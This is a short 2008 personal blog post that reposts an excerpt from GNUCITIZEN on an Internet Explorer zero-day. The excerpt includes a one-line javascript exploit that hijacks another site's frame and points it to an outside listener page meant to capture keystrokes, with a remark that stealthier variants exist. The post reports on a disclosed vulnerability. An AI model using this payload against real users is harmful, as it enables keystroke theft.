Andrea Lazzari’s blog

“I’m not a number, I’m a free man…”

25 07 2008

Ghost Busters: Zero-day flaw haunts Internet Explorer

Posted by: Andrea L. in hacking, sicurezza, vulnerabilità, tags: gnucitizen, ie, internet explorer, vulnerability

This way, we bypass IE’s protection and set our desired location without any problems. And the final exploit goes like this:

javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return ‘http://www.sirdarckcat.net/caballero-listener.html’;}}}catch(e){}},5000);void(1);

What caballero-listener does is just focusing itself, so it can catches onkeydown events.. there are a lot of ways of making the same thing in more stealth mode.

Ghost Busters | GNUCITIZEN

Vi fornisco direttamente il digest

This entry was posted on Friday, July 25th, 2008 at 12:39 pm and is filed under hacking, sicurezza, vulnerabilità.You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.